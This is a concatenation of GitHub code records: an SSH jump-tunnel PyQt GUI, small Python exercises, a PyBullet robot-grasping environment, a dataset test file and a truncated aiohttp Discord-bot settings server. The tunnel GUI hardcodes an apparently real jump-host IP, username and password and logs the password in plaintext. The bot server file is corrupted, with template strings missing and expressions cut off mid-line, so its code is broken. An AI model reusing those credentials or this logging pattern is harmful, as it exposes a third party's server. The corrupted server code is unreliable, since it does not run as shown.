(input(\"Please enter estimated monthly production: \")))\n\nprod_instance.display()\n\nprod_instance.months()\n","repo_name":"Julian-Barbachano/2023-Assignment--2","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"1446094611","text":"import sys\nfrom PyQt5.QtGui import QPixmap,QPalette\nfrom PyQt5 import QtCore,QtWidgets\nfrom PyQt5.QtWidgets import QWidget,QInputDialog,QMainWindow,QDialog,QLabel,QLineEdit,QGridLayout, QToolTip,QPushButton, QApplication\nfrom jumps.Jump_Tunnel import Jump_Tunnel\nfrom PyQt5.QtCore import Qt\nimport click\nimport time\nimport logging\nimport threading\n\njumphost = '117.48.195.186'\njumpport = 2222\njumpuser = 'dm'\njumppwd = 'Vts^pztbvE339@Rw'\ntunnelhost = '172.16.16.32'\ntunnelappport = 10000\nlocalhost = '127.0.0.1'\nlocalbindport = 4800\ndaemonsecond=2000\nlogger = logging.getLogger('ssh-jump-hive-gui')\nclass JumpTunnel(QWidget):\n\n def __init__(self):\n super().__init__()\n self.my_UI(True)\n def my_UI(self,test=False):\n jhLabel=QLabel(\"JumpHost:\")\n jpLabel=QLabel(\"JumpPort:\")\n juLable=QLabel(\"JumpUser:\")\n jpwdLabel=QLabel(\"JumpPwd:\")\n thLabel=QLabel(\"TunnelHost:\")\n tpLabel=QLabel(\"TunnelPort:\")\n lhLabel=QLabel(\"LocalHost:\")\n lpLabel=QLabel(\"LocalPort:\")\n gitLabel = QLabel(\"GithubRepo:\")\n dtLabel=QLabel(\"DaemonSecond:\")\n if test==True:\n self.jumpHost=QLineEdit(\"117.48.195.186\")\n self.jumpPwd=QLineEdit(\"Vts^pztbvE339@Rw\")\n self.tunnelHost=QLineEdit(\"172.16.16.32\")\n else:\n self.jumpHost = QLineEdit()\n self.jumpPwd = QLineEdit()\n self.tunnelHost = QLineEdit()\n self.jumpPort = QLineEdit(\"2222\")\n self.jumpUser = QLineEdit(\"dm\")\n self.tunnelPort=QLineEdit(\"10000\")\n self.localHost=QLineEdit(\"127.0.0.1\")\n self.localPort=QLineEdit(\"3560\")\n self.daemonSecond=QLineEdit(\"21600\")\n github=QLineEdit(\"https://github.com/mullerhai/sshjumphive\")\n self.btnConn = QPushButton(\"Trun ON\", self)\n self.btnClose=QPushButton(\"Trun Off\",self)\n self.grid=QGridLayout()\n self.grid.setSpacing(10)\n self.grid.addWidget(jhLabel,2,0)\n self.grid.addWidget(self.jumpHost,2,1)\n self.grid.addWidget(jpLabel,2,2)\n self.grid.addWidget(self.jumpPort,2,3)\n self.grid.addWidget(juLable,3,0)\n self.grid.addWidget(self.jumpUser,3,1)\n self.grid.addWidget(jpwdLabel,3,2)\n self.grid.addWidget(self.jumpPwd,3,3)\n self.grid.addWidget(thLabel,5,0)\n self.grid.addWidget(self.tunnelHost,5,1)\n self.grid.addWidget(tpLabel,5,2)\n self.grid.addWidget(self.tunnelPort,5,3)\n self.grid.addWidget(lhLabel,7,0)\n self.grid.addWidget(self.localHost,7,1)\n self.grid.addWidget(lpLabel,7,2)\n self.grid.addWidget(self.localPort,7,3)\n self.grid.addWidget(gitLabel,8,0)\n self.grid.addWidget(github,8,1)\n self.grid.addWidget(dtLabel,8,2)\n self.grid.addWidget(self.daemonSecond,8,3)\n self.grid.addWidget(self.btnConn,9,0)\n self.grid.addWidget(self.btnClose,9,3)\n pixmap = QPixmap(\"../img/guilogo.jpg\")\n pixmap=pixmap.scaledToHeight(80)\n pixmap=pixmap.scaledToWidth(180)\n lbl = QLabel(self)\n lbl.setFixedHeight(80)\n lbl.setFixedWidth(180)\n lbl.setPixmap(pixmap)\n self.grid.addWidget(lbl,10,1)\n pixfox = QPixmap(\"../img/tunnel.jpg\")\n pixfox=pixfox.scaledToHeight(90)\n pixfox=pixfox.scaledToWidth(90)\n lblfox = QLabel(self)\n lblfox.setFixedHeight(90)\n lblfox.setFixedWidth(90)\n lblfox.setPixmap(pixfox)\n self.grid.addWidget(lblfox,10,2)\n self.btnConn.clicked.connect(self.buttonClicked)\n self.btnClose.clicked.connect(self.btnCloseSession)\n self.setLayout(self.grid)\n self.setWindowTitle('SSH-Jump-Hive')\n self.setGeometry(300, 300, 490, 450)\n self.show()\n\n def btnCloseSession(self):\n # text, ok = QInputDialog.getText(self, 'Turn Off',\n # 'Please Input 1 then Trun off tunnel :')\n # logging.warn(msg=\"Will kill recently ssh 
tunnle process\")\n # if ok and text=='1':\n try:\n self.jump_tunnel.client.close()\n logging.info(msg=\"ssh_tunnel turn off successfully\")\n sucTLabel = QLabel(\"turn off Success\")\n self.grid.addWidget(sucTLabel, 9, 1)\n # text, ok = QInputDialog.getText(self, 'Success',\n # 'ssh_tunnel turn off successfully close dialog ok')\n except:\n failedTLabel = QLabel(\"turn off be Failed\")\n self.grid.addWidget(failedTLabel, 9, 2)\n # text, ok = QInputDialog.getText(self, 'Failed',\n # 'ssh_tunnel turn off failed check the config')\n logging.error(msg=\"ssh_tunnel turn off failed,please try again\")\n # else:\n # failedTLabel = QLabel(\"turn off Failed\")\n # self.grid.addWidget(failedTLabel, 9, 2)\n # text, ok = QInputDialog.getText(self, 'Failed',\n # 'ssh_tunnel turn off failed check the config')\n def buttonClicked(self): # 在buttonClikced()方法中,我们调用sender()方法来判断哪一个按钮是我们按下的\n jumphost=self.jumpHost.text().strip()\n jumpuser=self.jumpUser.text().strip()\n jumppwd=self.jumpPwd.text().strip()\n tunnelhost=self.tunnelHost.text().strip()\n localhost=self.localHost.text().strip()\n\n logging.info(msg=self.jumpHost.text()+\"%%\"+self.jumpUser.text()+\"%%\"+self.jumpPwd.text())\n try:\n jumpport = (int(self.jumpPort.text().strip()) if self.jumpPort.text().strip() != None else 2222)\n tunnelappport = (int(self.tunnelPort.text().strip()) if self.tunnelPort.text().strip() != None else 10000)\n localbindport = (int(self.localPort.text().strip()) if self.localPort.text().strip() != None else 4320)\n daemonsecond = (int(self.daemonSecond.text().strip()) if self.daemonSecond.text().strip() != None else 21600)\n\n self.jump_tunnel=Jump_Tunnel(jumphost,jumpport,jumpuser,jumppwd,tunnelhost,tunnelappport,localhost,localbindport)\n tunnel_conn=self.jump_tunnel.jump_con_tunnel()\n\n with tunnel_conn:\n #time.sleep(0.1)\n logging.info(msg=\"启动成功\")\n sucLabel = QLabel(\"Connect Success\")\n self.grid.addWidget(sucLabel, 9, 2)\n # pe = QPalette()\n # pe.setColor(QPalette.WindowText, Qt.red)\n #sucLabel.setAutoFillBackground(pe)\n\n text, ok = QInputDialog.getText(self, 'Success',\n 'connect ssh tunnel successfully close dialog ok')\n time.sleep(daemonsecond)\n except:\n logging.info(msg=\"启动失败\")\n failedLabel=QLabel(\"Connect Failed\")\n self.grid.addWidget(sucLabel, 9, 2)\n # text, ok = QInputDialog.getText(self, 'Failed',\n # 'connect ssh tunnel failed check the config')\n\n #sender = self.sender()\n # self.showMessage(sender.text() + ' 是发送者')\n\ndef main():\n app = QApplication(sys.argv)\n jtGui = JumpTunnel()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = JumpTunnel()\n sys.exit(app.exec_())\n","repo_name":"mullerhai/sshjumphive","sub_path":"jumps/jump_gui.py","file_name":"jump_gui.py","file_ext":"py","file_size_in_byte":6564,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"69"}
+{"seq_id":"7392353128","text":"states = [\n {\n \"state\":\"New Jersey\",\n \"capital\": \"Trenton\",\n \"continent\": \"North America\"\n },\n {\n \"state\":\"New York\",\n \"capital\": \"Albany\",\n \"continent\": \"North America\"\n },\n {\n \"state\":\"Pennsylvania\",\n \"capital\": \"Harrisburg\",\n \"continent\": \"North America\"\n },\n {\n \"state\":\"Wisconsin\",\n \"capital\": \"Madison\",\n \"continent\": \"North America\"\n }\n]\nprint(states[-1][\"capital\"])\n\n\ncountries = [\n\t{\n\t\t'country': 'South Africa',\n\t\t'capital': 'Pretoria',\n\t\t'continent': 'Africa'\n\t},\n\t{\n\t\t'country': 'USA',\n\t\t'capital': 'Washington DC',\n\t\t'continent': 'North America'\n\t},\n\t{\n\t\t'country': 'Panama',\n\t\t'capital': 'Panama City',\n\t\t'continent': 'North America'\n\t},\n\t{\n\t\t'country': 'Israel',\n\t\t'capital': 'Jerusalem',\n\t\t'continent': 'Asia'\n\t},\n\t{\n\t\t'country': 'Palestine',\n\t\t'capital': 'Al Quds',\n\t\t'continent': 'Asia'\n\t}\n]\n\nnumber_of_continents = set()\nfor country in countries:\n number_of_continents.add((country[\"continent\"]))\n\nprint(f\"Number of continents is: {len(number_of_continents)}\")\n\n\n\n# sampleDict = { \n# \"class\":{ \n# \"student\":{ \n# \"name\":\"Mike\",\n# \"marks\":{ \n# \"physics\":70,\n# \"history\":80\n# }\n# }\n# }\n# }\n\nsampleDict = {\n \"name\": \"Kelly\",\n \"age\":25,\n \"salary\": 8000,\n \"city\": \"New york\"\n\n}\nkeysToRemove = [\"name\", \"salary\"]\nfor key in keysToRemove:\n del sampleDict[key]\nprint(sampleDict)\n\n\n\n# Hashtable\nnames = [\"jon\", \"jackie\", \"gabi\", \"dennis\", \"kobe\"]\nphonebook = {}\nfor name in names:\n key = name[0].upper()\n if key not in phonebook:\n phonebook[key] = [name]\n else:\n phonebook[key].append(name)\nprint(phonebook)\n\n# letter_lookup = {name[0].upper() : name for name in names}\n# print(letter_lookup)","repo_name":"jacprez/developers.institute","sub_path":"Week 4/Day 3/Class Exercises/class.py","file_name":"class.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"29162001321","text":"import glob\nimport os\nimport random\nfrom abc import ABC, abstractmethod\n\nimport cv2\nimport gymnasium\nimport numpy as np\nimport pybullet as p\nimport pybullet_data as pd\nfrom agent import Kuka\nfrom gymnasium import spaces\nfrom gymnasium.utils import seeding\n\n\nclass KukaGraspEnvFramework(\n gymnasium.Env,\n ABC,\n):\n \"\"\"Kuka robotic arm grasp envs' framework.\"\"\"\n\n def __init__(\n self,\n render=True,\n is_test=False,\n block_random=0.2,\n dv=0.1,\n max_step=10,\n camera_random=0,\n width=128,\n height=128,\n show_image=False,\n use_depth_image=False,\n ):\n \"\"\"Initializes the KukaDiverseObjectEnv.\n\n Args:\n renders: If true, render the bullet GUI.\n is_test: If true, use the test set of objects. If false, use the train\n set of objects.\n block_random: A float between 0 and 1 indicated block randomness. 0 is\n deterministic.\n dv: The velocity along each dimension for each action.\n max_step: The maximum number of actions per episode.\n camera_random: A float between 0 and 1 indicating camera placement\n randomness. 0 is deterministic.\n width: The image width.\n height: The observation image height.\n num_objects: The number of objects in the bin.\n show_image:\n use_depth_image:\n\n \"\"\"\n super(KukaGraspEnvFramework, self).__init__()\n self.urdf_root = pd.getDataPath() # << pybullet自带的urdf文件路径\n self.time_step = 1.0 / 240 # << 每一步的仿真时间\n self.env_step = 0\n self.is_test = is_test\n self.max_force = 500\n self.max_velocity = 0.25\n self.block_random = block_random\n self.dv = dv\n self.camera_random = camera_random\n self.width = width\n self.height = height\n self.vision_servo = False\n self.use_depth_image = use_depth_image\n self.max_step = max_step\n self.show_image = show_image\n # several parameters\n self.action_apply_time = 500\n self.successful_grasp_times = 0 # << 抓取成功次数\n self.total_grasp_times = 0 # << 尝试抓取次数\n\n # connect the physics engine\n if render:\n self.cid = p.connect(p.SHARED_MEMORY)\n if self.cid < 0:\n self.cid = p.connect(p.GUI)\n # set God view 上帝视角\n p.resetDebugVisualizerCamera(\n cameraDistance=1.3,\n cameraYaw=180,\n cameraPitch=-41,\n cameraTargetPosition=[0.52, -0.2, -0.33],\n )\n else:\n self.cid = p.connect(p.DIRECT)\n self.seed()\n ########################################################################\n # observation spaces\n ########################################################################\n if self.use_depth_image:\n pass\n else:\n self.observation_space = spaces.Box(\n low=0, high=1, shape=(3, self.height, self.width), dtype=np.float32\n )\n\n @abstractmethod\n def reset(self):\n \"\"\"please implement in subclass\"\"\"\n\n def env_reset(self):\n ########################################################################\n # set the environment of pybullet\n ########################################################################\n p.resetSimulation()\n p.setPhysicsEngineParameter(numSolverIterations=150) # 求解迭代器的次数\n p.setTimeStep(self.time_step) # 时间步长\n # load objects\n p.loadURDF(os.path.join(self.urdf_root, \"plane.urdf\"), [0, 0, -1])\n p.loadURDF(\n os.path.join(self.urdf_root, \"table/table.urdf\"),\n 0.5000000,\n 0.00000,\n -0.820000,\n 0.000000,\n 0.000000,\n 0.0,\n 1.0,\n )\n p.setGravity(0, 0, -9.81)\n ########################################################################\n # load block\n ########################################################################\n self.tray_uid = p.loadURDF(\n os.path.join(self.urdf_root, \"tray/tray.urdf\"),\n 0.640000,\n 0.075000,\n 
 self.tray_uid = p.loadURDF(\n os.path.join(self.urdf_root, \"tray/tray.urdf\"),\n 0.640000,\n 0.075000,\n -0.190000,\n 0.000000,\n 0.000000,\n 1.000000,\n 0.000000,\n )\n ########################################################################\n # load kuka\n ########################################################################\n self.kuka = Kuka(time_step=self.time_step)\n ########################################################################\n # set camera\n ########################################################################\n # TODO(ecstayalive@163.com): optimize the camera position\n target_position = [0.23, 0.2, 0.54]\n distance = 0.5\n pitch = -56 + self.camera_random * np.random.uniform(-3, 3)\n yaw = 245 + self.camera_random * np.random.uniform(-3, 3)\n roll = 0\n self.view_mat = p.computeViewMatrixFromYawPitchRoll(\n target_position, distance, yaw, pitch, roll, 2\n )\n fov = 20.0 + self.camera_random * np.random.uniform(-2, 2)\n aspect = self.width / self.height\n near = 0.01\n far = 10\n self.proj_mat = p.computeProjectionMatrixFOV(fov, aspect, near, far)\n\n ########################################################################\n # set field of view size\n ########################################################################\n # NOTE: this second setup overrides the fov=20 projection matrix built just above\n fov = 60\n aspect = self.width / self.height\n near = 0.1\n far = 100\n self.proj_mat = p.computeProjectionMatrixFOV(fov, aspect, near, far)\n ########################################################################\n # set parameters\n ########################################################################\n # simulation step counter\n self.env_step = 0\n ########################################################################\n # Choose the objects in the bin\n ########################################################################\n self.num_objects = np.random.randint(1, 6)\n urdf_list = self.get_random_objects(self.num_objects, self.is_test)\n self.object_uids = self.place_objects_randomly(urdf_list)\n self.observation = self.get_observation()\n return self.observation\n\n def seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n @abstractmethod\n def step(self, action):\n \"\"\"please implement in subclass\"\"\"\n\n @abstractmethod\n def reward(self):\n \"\"\"Reward function.\n Changing the reward function changes the robot's behaviour;\n currently a successful grasp is rewarded with 1 and everything else with 0.\n\n Returns:\n reward\n\n \"\"\"\n\n \"\"\"please implement in subclass\"\"\"\n\n def place_objects_randomly(self, urdf_list):\n \"\"\"Place objects randomly\"\"\"\n # Randomize positions of each object urdf.\n object_uids = []\n for urdf_name in urdf_list:\n xpos = 0.4 + self.block_random * random.random()\n ypos = self.block_random * (random.random() - 0.5)\n angle = np.pi / 2 + self.block_random * np.pi * random.random()\n orn = p.getQuaternionFromEuler([0, 0, angle])\n urdf_path = os.path.join(self.urdf_root, urdf_name)\n uid = p.loadURDF(\n urdf_path, [xpos, ypos, 0.15], [orn[0], orn[1], orn[2], orn[3]]\n )\n object_uids.append(uid)\n # Let each object fall into the tray individually, to prevent objects\n # from intersecting.\n for _ in range(500):\n p.stepSimulation()\n return object_uids\n\n def get_observation(self):\n \"\"\"Get the camera image for the current step.\"\"\"\n # View state\n (_, _, px, dx, _) = p.getCameraImage(\n width=self.width,\n height=self.height,\n viewMatrix=self.view_mat,\n projectionMatrix=self.proj_mat,\n )\n self.rgb_image = np.array(px, dtype=np.uint8)[:, :, :3][:, :, ::-1]\n # self.rgb_image = cv2.cvtColor(self.rgb_image, cv2.COLOR_BGR2GRAY)\n if self.show_image:\n img = self.rgb_image.copy()\n cv2.imshow(\"observation\", img)\n cv2.waitKey(1)\n
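 # normalize to [0, 1] floats and transpose to channels-first (C, H, W) so the\n # frame matches the Box observation space declared in __init__\n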
 self.rbg_image = np.array(self.rgb_image / 255.0, dtype=np.float32)\n return self.rbg_image.transpose(2, 0, 1)\n\n def get_random_objects(self, num_objects, test):\n \"\"\"Randomly choose an object urdf from the random_urdfs directory.\"\"\"\n if test:\n urdf_pattern = os.path.join(self.urdf_root, \"random_urdfs/*0/*.urdf\")\n else:\n urdf_pattern = os.path.join(self.urdf_root, \"random_urdfs/*[1-9]/*.urdf\")\n found_object_directories = glob.glob(urdf_pattern)\n total_num_objects = len(found_object_directories)\n selected_objects = np.random.choice(np.arange(total_num_objects), num_objects)\n return [\n found_object_directories[object_index] for object_index in selected_objects\n ]\n\n @abstractmethod\n def terminate(self):\n \"\"\"Terminating function, used to end the current run.\n\n \"\"\"\n\n \"\"\"please implement in subclass\"\"\"\n\n def close(self):\n \"\"\"Close simulation environment\"\"\"\n p.disconnect()\n","repo_name":"ecstayalive/Thunder","sub_path":"envs/kuka_grasp_env/framework.py","file_name":"framework.py","file_ext":"py","file_size_in_byte":9609,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"69"}
+{"seq_id":"2031909429","text":"number = int(input('\\033[1;31mDigite o primeiro valor: \\033[0;0m'))\nconclusão = 0\nfor primo in range(1, number + 1):\n if number % primo == 0:\n print('\\033[1;33m{}\\033[0;0m'.format(primo), end= ' ')\n conclusão += 1\n else:\n print('\\033[1;34m{}\\033[0;0m'.format(primo), end= ' ')\nprint('\\n\\033[1;31mO número {} é divisível {} vezes'.format(number, conclusão))\nif conclusão == 2:\n print('Então ele é PRIMO')\nelse:\n print('Então ele não é PRIMO\\033[0;0m')\n","repo_name":"Nero1Dev/ExerciciosPython","sub_path":"ex052.py","file_name":"ex052.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"12114914493","text":"#!/usr/bin/env python3\n\nfrom pathlib import Path\nimport pdb\nfrom mseg.dataset_apis.SunrgbdImageLevelDataset import SunrgbdImageLevelDataset\n\n_TEST_DIR = Path(__file__).resolve().parent\n\n\ndef test_constructor() -> None:\n \"\"\" \"\"\"\n dataroot = f\"{_TEST_DIR}/test_data/SUNRGBD_test_data\"\n bddild = SunrgbdImageLevelDataset(dataroot)\n\n\ndef test_get_img_pair() -> None:\n \"\"\" \"\"\"\n dataroot = f\"{_TEST_DIR}/test_data/SUNRGBD_test_data\"\n bddild = SunrgbdImageLevelDataset(dataroot)\n\n split = \"train\"\n fname_stem = \"img-000001\"\n rgb_img, label_img = bddild.get_img_pair(fname_stem, split)\n assert rgb_img.mean() - 134.806 < 1e-3\n assert label_img.mean() - 16.788 < 1e-3\n\n split = \"test\"\n fname_stem = \"img-000001\"\n rgb_img, label_img = bddild.get_img_pair(fname_stem, split)\n assert rgb_img.mean() - 125.300 < 1e-3\n assert label_img.mean() - 47.588 < 1e-3\n\n\ndef test_get_segment_mask() -> None:\n \"\"\" \"\"\"\n dataroot = f\"{_TEST_DIR}/test_data/SUNRGBD_test_data\"\n bddild = SunrgbdImageLevelDataset(dataroot)\n seq_id = \"\"\n query_segmentid = 21 # ceiling\n fname_stem = \"img-000001\"\n split = \"test\"\n\n class_mask = bddild.get_segment_mask(seq_id, query_segmentid, fname_stem, split)\n assert class_mask.sum() == 37819\n assert class_mask.mean() - 0.098 < 1e-3\n assert class_mask.size == 386900\n\n\nif __name__ == \"__main__\":\n # pass\n # test_constructor()\n # test_get_img_pair()\n test_get_segment_mask()\n","repo_name":"mseg-dataset/mseg-api","sub_path":"tests/test_SunrgbdImageLevelDataset.py","file_name":"test_SunrgbdImageLevelDataset.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":239,"dataset":"github-code","pt":"69"}
+{"seq_id":"70039357340","text":"import os\nimport re\nimport time\nfrom html import escape\nfrom urllib.parse import quote_plus as urlquote\nimport sqlite3 as sql\nfrom hashlib import sha256\nimport asyncio\nimport mimetypes\nfrom aiohttp import web, ClientSession\nfrom kenny2automate.utils import DummyCtx\nfrom kenny2automate.i18n import LANG, i18n\n\nDISCORD_API = 'https://discordapp.com/api/v6'\nLANG = {i: i18n(i, 'qqq') for i in LANG}\nONE_YEAR = 31557600\nGLOBAL_GAMES = [\n 'Go Fish', 'Connect 4',\n 'Fight', 'Boggle', 'Uno',\n 'Blackjack', 'Set', 'Chess',\n '007', 'Big Two'\n]\n\nclass Handler:\n dtx = DummyCtx(author=DummyCtx(name='(server)'))\n\n def __init__(\n self, bot, db, logger, prefix,\n client_id, client_secret, web_root,\n document_root=os.path.abspath(os.path.dirname(__file__))\n ):\n self.bot = bot\n self.db = db\n self.logger = logger\n self.prefix = prefix\n self.sessions = {}\n self.client_id = client_id\n self.client_secret = client_secret\n self.web_root = web_root\n self.root = document_root\n self.app = web.Application()\n self.app.add_routes([\n web.get('/', self.index),\n web.get('/login', self.login),\n web.get('/settings', self.settings),\n web.post('/settings', self.save_settings),\n web.get('/servers', self.servers),\n web.get(r'/servers/{server:\\d+}', self.server),\n web.post(r'/servers/{server:\\d+}', self.save_server),\n web.get(r'/{name:.+(? ONE_YEAR\n ):\n sess = {\n 'logged_in': None,\n 'last_use': time.time(),\n 'state': str(time.time())\n }\n if resp is not None:\n resp.set_cookie('session', sesh, max_age=ONE_YEAR)\n resp.set_cookie('state', sess['state'], max_age=ONE_YEAR)\n self.setsesh(sesh, sess)\n return sesh\n if sess['logged_in'] is not None:\n if time.time() > sess['logged_in'] + sess['expires_in']:\n data = {\n 'client_id': self.client_id,\n 'client_secret': self.client_secret,\n 'grant_type': 'refresh_token',\n 'refresh_token': sess['refresh_token'],\n 'redirect_uri': self.web_root + '/login',\n 'scope': 'identify guilds'\n }\n async with self.sessions[sesh].post(\n DISCORD_API + '/oauth2/token',\n data=data,\n headers={'Content-Type':'application/x-www-form-urlencoded'}\n ) as r:\n body = await r.json()\n body['logged_in'] = time.time()\n sess.update(body)\n await self.sessions[sesh].close()\n self.sessions[sesh] = ClientSession(headers={\n 'Authorization': '{} {}'.format(\n sess['token_type'], sess['access_token']\n )\n })\n sess['last_use'] = time.time()\n self.setsesh(sesh, sess)\n return None\n\n def getsesh(self, request):\n if not isinstance(request, str):\n request = request.cookies.get('session', None)\n if request is None:\n return {}\n return (self.db.execute(\n 'SELECT session FROM server_sessions WHERE session_id=?',\n (request,)\n ).fetchone() or ([{}],))[0][0]\n\n def setsesh(self, request, sesh):\n if not isinstance(request, str):\n request = request.cookies.get('session', None)\n if request is None:\n return\n if not self.getsesh(request):\n self.db.execute(\n 'INSERT INTO server_sessions VALUES (?, ?)',\n (request, [sesh])\n )\n self.sessions[request] = ClientSession()\n else:\n self.db.execute(\n 'UPDATE server_sessions SET session=? 
WHERE session_id=?',\n ([sesh], request)\n )\n\n def checkuser(self, user_id):\n res = self.db.execute(\n 'SELECT user_id FROM users WHERE user_id=?',\n (user_id,)\n ).fetchone()\n if res is None:\n self.db.execute(\n 'INSERT INTO users (user_id) VALUES (?)',\n (user_id,)\n )\n\n def logged_in(self, request):\n return self.getsesh(request).get('logged_in', None) is not None\n\n def notfound(self, *_):\n raise web.HTTPNotFound(\n text=self.letext('404.html'),\n content_type='text/html'\n )\n\n async def elg(self, request):\n if (await self.checksesh(request)) is not None:\n if request.method != 'GET':\n raise web.HTTPSeeOther(str(request.path))\n self.notfound()\n if not self.logged_in(request):\n self.notfound()\n\n def lang(self, request):\n if not self.logged_in(request):\n available = set(LANG.keys())\n preferred = (j[0] for j in sorted((\n (i.group(1), float(i.group(2) or '1'))\n for i in re.finditer(\n r'(?{}'.format(\n i, ' selected' if i == lang else '', j\n ) for i, j in LANG.items())\n options = '{} '.format(\n ' selected' if lang is None else '',\n i18n(lang or 'en', 'server/lang-auto')\n ) + options\n ping_th = ''.join(\n '{} '.format(i)\n for i in GLOBAL_GAMES\n )\n ping_th = '{} \\n'.format(\n len(GLOBAL_GAMES),\n i18n(lang or 'en', 'server/ping-message')\n ) + ping_th + ' '\n ping_options = '\\n'.join(\n \"\"\" \n \n \n \"\"\".format(g, 'checked ' if g in games else '')\n for g in GLOBAL_GAMES\n )\n return web.Response(\n text=self.letext(\n 'settings.html',\n i18n(lang or 'en', 'server/settings;h1')\n ).format(\n escape(prefix),\n options,\n ping_th,\n ping_options,\n h1=i18n(lang or 'en', 'server/settings;h1'),\n prefix=i18n(lang or 'en', 'server/settings;prefix'),\n lang=i18n(lang or 'en', 'server/settings;lang'),\n save=i18n(lang or 'en', 'server/server;save'),\n back=i18n(lang or 'en', 'server/server;back'),\n ),\n content_type='text/html'\n )\n\n async def save_settings(self, request):\n await self.elg(request)\n data = await request.post()\n for k in ('prefix', 'lang', 'ping'):\n if k not in data:\n self.notfound()\n user_id = self.getsesh(request)['client']['id']\n self.checkuser(user_id)\n with self.db.connection:\n self.db.execute(\n 'UPDATE users SET prefix=?, lang=?, games_ping=? 
WHERE user_id=?',\n (\n data['prefix'] if data['prefix'].strip() else None,\n data['lang'].strip() or None,\n '|'.join(data.getall('ping')),\n user_id\n )\n )\n raise web.HTTPSeeOther(str(request.path))\n\n async def servers(self, request):\n await self.elg(request)\n sess = self.getsesh(request)\n lan = self.lang(request)\n guilds = tuple(filter(\n lambda i: (\n i and i.get_member(\n int(sess['client']['id'])\n ).guild_permissions.administrator\n ), (\n self.bot.get_guild(int(i['id']))\n for i in sess['servers']\n )\n ))\n options = ' '.join(\"\"\"\n\n \n \n\"\"\".strip().format(\n str(request.path), i.id, escape(i.name), i.icon_url_as(format='png', size=64)\n ) for i in guilds)\n return web.Response(\n text=self.letext(\n 'servers.html',\n i18n(lan, 'server/servers;h1')\n ).format(\n options,\n h1=i18n(lan, 'server/servers;h1'),\n div=i18n(lan, 'server/servers;div'),\n back=i18n(lan, 'server/server;back'),\n ),\n content_type='text/html'\n )\n\n async def server(self, request):\n await self.elg(request)\n guild = self.bot.get_guild(int(request.match_info.get('server', '0')))\n if guild is None:\n self.notfound()\n if not guild.get_member(\n int(self.getsesh(request)['client']['id'])\n ).guild_permissions.administrator:\n self.notfound()\n lan = self.lang(request)\n options = \"\"\"\n \n {} \n {} \n {} \n \n {}\n \"\"\".format(\n i18n(lan, 'server/server;channel'),\n i18n(lan, 'server/server;language'),\n len(GLOBAL_GAMES),\n i18n(lan, 'server/ping-message'),\n '\\n'.join('{} '.format(i) for i in GLOBAL_GAMES),\n )\n non = i18n(lan, 'server/lang-none')\n for i in guild.text_channels:\n lang = self.db.execute(\n 'SELECT lang, games_ping FROM channels WHERE channel_id=?',\n (i.id,)\n ).fetchone()\n if lang is None:\n self.db.execute(\n 'INSERT INTO channels (channel_id) VALUES (?)',\n (i.id,)\n )\n lang, games = lang, []\n else:\n lang, games = lang\n games = (games or '').split('|')\n lang_options = '\\n'.join('{} '.format(\n a, ' selected' if a == lang else '', b\n ) for a, b in LANG.items())\n lang_options = '{} \\n'.format(\n ' selected' if lang is None else '', non\n ) + lang_options\n ping_options = '\\n'.join(\n \"\"\" \n \n \n \"\"\".format(i.id, g, 'checked ' if g in games else '')\n for g in GLOBAL_GAMES\n )\n options += \"\"\"\n \n # {0}
\n \n {2}\n \n {3}\n \"\"\".format(\n i.name, i.id, lang_options, ping_options\n )\n res = self.db.execute(\n 'SELECT guild_disabled_commands, guild_disabled_cogs, words_censor \\\nFROM guilds WHERE guild_id=?',\n (guild.id,)\n ).fetchone()\n if res is None:\n cmds, cogs, censor = [], [], ''\n self.db.execute(\n 'INSERT INTO guilds (guild_id) VALUES (?)',\n (guild.id,)\n )\n else:\n cmds, cogs, censor = res\n cmds = (cmds or '').split(',')\n cogs = (cogs or '').split(',')\n censor = censor or ''\n dcmds = ''\n def recurse_commands(thing):\n nonlocal dcmds\n if hasattr(thing, 'commands'):\n for cmd in thing.commands:\n hide = False\n parent = cmd.parent\n while parent:\n if parent.qualified_name in cmds:\n hide = True\n break\n parent = parent.parent\n dcmds += \"\"\"\n \n {prefix}{option}\n \"\"\".format(\n option=cmd.qualified_name,\n parent=cmd.parent.qualified_name if cmd.parent else '',\n cog=cmd.cog_name or 'None',\n display=(\n 'display: none'\n if (\n hide or cmd.cog_name in cogs\n )\n else ''\n ),\n prefix=self.bot.command_prefix(self.bot, None)\n )\n recurse_commands(cmd)\n recurse_commands(self.bot)\n dcogs = \"\"\"\n \n {}\n \"\"\".format(non)\n for cog in self.bot.cogs.keys():\n dcogs += \"\"\"\n \n {option}\n \"\"\".format(option=cog)\n h1 = i18n(lan, 'server/server;h1', escape(guild.name))\n return web.Response(\n text=self.letext(\n 'server.html',\n h1\n ).format(\n channels=options,\n cmds=dcmds,\n cogs=dcogs,\n dcmds=cmds,\n dcogs=cogs,\n jcmds=','.join(cmds),\n jcogs=','.join(cogs),\n words_censor=i18n(\n lan, 'words/server-censor-title',\n '{}{}'.format(\n self.bot.command_prefix(self.bot, None),\n 'words'\n ),\n ),\n censor=censor,\n cmd=i18n(lan, 'server/server;command'),\n cog=i18n(lan, 'server/server;cog'),\n disabled=i18n(lan, 'server/server;disabled'),\n h1=h1,\n save=i18n(lan, 'server/server;save'),\n back=i18n(lan, 'server/server;back'),\n ),\n content_type='text/html'\n )\n\n async def save_server(self, request):\n await self.elg(request)\n guild = self.bot.get_guild(int(request.match_info.get('server', '0')))\n if guild is None:\n self.notfound()\n if not guild.get_member(\n int(self.getsesh(request)['client']['id'])\n ).guild_permissions.administrator:\n self.notfound()\n data = await request.post()\n params = []\n otherparams = {}\n for k in data.keys():\n if not k.startswith('channel-'):\n otherparams[k] = ','.join(data.getall(k))\n continue\n param = {'channel_id': int(k[len('channel-'):])}\n for v in data.getall(k):\n v = v.partition('=')\n if v[0] == 'ping':\n if 'ping' not in 